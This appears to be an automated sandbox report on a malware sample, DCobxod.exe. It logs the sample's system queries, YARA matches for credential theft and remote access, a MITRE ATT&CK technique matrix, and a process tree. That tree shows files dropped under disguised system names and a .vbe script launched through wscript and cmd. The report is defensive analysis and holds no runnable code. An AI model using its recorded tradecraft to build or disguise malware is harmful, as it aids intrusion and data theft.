Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\winlogon.exe | Queries volume information: C:\ProgramData\SoftwareDistribution\winlogon.exe | VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\winlogon.exe | Queries volume information: C:\ProgramData\SoftwareDistribution\winlogon.exe | VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe | Queries volume information: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe | VolumeInformation
Source: C:\Browserhost\intoHostperf.exe | Queries volume information: C:\Browserhost\intoHostperf.exe | VolumeInformation
Source: C:\Browserhost\intoHostperf.exe | Queries volume information: C:\Browserhost\intoHostperf.exe | VolumeInformation
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: 0_2_0042DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, | 0_2_0042DF1E
Source: C:\Users\user\Desktop\DCobxod.exe | Code function: 0_2_0041B146 GetVersionExW, | 0_2_0041B146
Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                                    Stealing of Sensitive Information

Source: Yara match | File source: 00000005.00000002.2317163401.0000000012C53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: intoHostperf.exe PID: 5828, type: MEMORYSTR
Source: Yara match | File source: DCobxod.exe, type: SAMPLE
Source: Yara match | File source: 0.3.DCobxod.exe.6c0e6ef.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.DCobxod.exe.6c0e6ef.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.DCobxod.exe.75296ef.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.intoHostperf.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.DCobxod.exe.75296ef.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.2042681440.0000000006BC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2043620112.00000000074DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.2079779312.0000000000122000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: C:\Browserhost\LaSqLWtOcizKrlm.exe, type: DROPPED
Source: Yara match | File source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\upfc.exe, type: DROPPED
Source: Yara match | File source: C:\ProgramData\SoftwareDistribution\winlogon.exe, type: DROPPED
Source: Yara match | File source: C:\Browserhost\intoHostperf.exe, type: DROPPED
Source: Yara match | File source: DCobxod.exe, type: SAMPLE
Source: Yara match | File source: 0.3.DCobxod.exe.6c0e6ef.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.DCobxod.exe.6c0e6ef.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.DCobxod.exe.75296ef.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.intoHostperf.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.DCobxod.exe.75296ef.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Browserhost\LaSqLWtOcizKrlm.exe, type: DROPPED
Source: Yara match | File source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\upfc.exe, type: DROPPED
Source: Yara match | File source: C:\ProgramData\SoftwareDistribution\winlogon.exe, type: DROPPED
Source: Yara match | File source: C:\Browserhost\intoHostperf.exe, type: DROPPED

                                    Remote Access Functionality

Source: Yara match | File source: 00000005.00000002.2317163401.0000000012C53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: intoHostperf.exe PID: 5828, type: MEMORYSTR
Source: Yara match | File source: DCobxod.exe, type: SAMPLE
Source: Yara match | File source: 0.3.DCobxod.exe.6c0e6ef.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.DCobxod.exe.6c0e6ef.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.DCobxod.exe.75296ef.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.intoHostperf.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.DCobxod.exe.75296ef.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.2042681440.0000000006BC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2043620112.00000000074DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.2079779312.0000000000122000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: C:\Browserhost\LaSqLWtOcizKrlm.exe, type: DROPPED
Source: Yara match | File source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\upfc.exe, type: DROPPED
Source: Yara match | File source: C:\ProgramData\SoftwareDistribution\winlogon.exe, type: DROPPED
Source: Yara match | File source: C:\Browserhost\intoHostperf.exe, type: DROPPED
Source: Yara match | File source: DCobxod.exe, type: SAMPLE
Source: Yara match | File source: 0.3.DCobxod.exe.6c0e6ef.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.DCobxod.exe.6c0e6ef.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.DCobxod.exe.75296ef.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.intoHostperf.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.DCobxod.exe.75296ef.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Browserhost\LaSqLWtOcizKrlm.exe, type: DROPPED
Source: Yara match | File source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\upfc.exe, type: DROPPED
Source: Yara match | File source: C:\ProgramData\SoftwareDistribution\winlogon.exe, type: DROPPED
Source: Yara match | File source: C:\Browserhost\intoHostperf.exe, type: DROPPED
MITRE ATT&CK Matrix (numbers prefixed to a technique are the count of matching signatures):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 11 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 11 Scripting | 1 DLL Side-Loading | 11 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | 1 Taint Shared Content | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | 21 Registry Run Keys / Startup Folder | 21 Registry Run Keys / Startup Folder | 2 Obfuscated Files or Information | Security Account Manager | 37 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Software Packing | NTDS | 121 Security Software Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 132 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 31 Virtualization/Sandbox Evasion | Proc Filesystem | 1 Remote System Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Process Injection | /etc/passwd and /etc/shadow | 1 System Network Configuration Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
Behavior Graph ID: 1590003 | Sample: DCobxod.exe | Startdate: 13/01/2025 | Architecture: WINDOWS | Score: 100

Process tree recovered from the behavior graph (numbers in parentheses after a process name are the created registry value / file counts shown on the graph node):

Start
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for dropped file; 16 other signatures
  Started: DCobxod.exe (3 6); upfc.exe (2); LaSqLWtOcizKrlm.exe; 8 other processes

DCobxod.exe
  Dropped: C:\Browserhost\intoHostperf.exe (PE32); H1Tsc0Ilqr3tfV2ZqDRU0epu1xRlbvhuJExp.vbe (data)
  Started: wscript.exe (1)

upfc.exe
  Signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file

wscript.exe
  Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found
  Started: cmd.exe (1)

cmd.exe (child of wscript.exe)
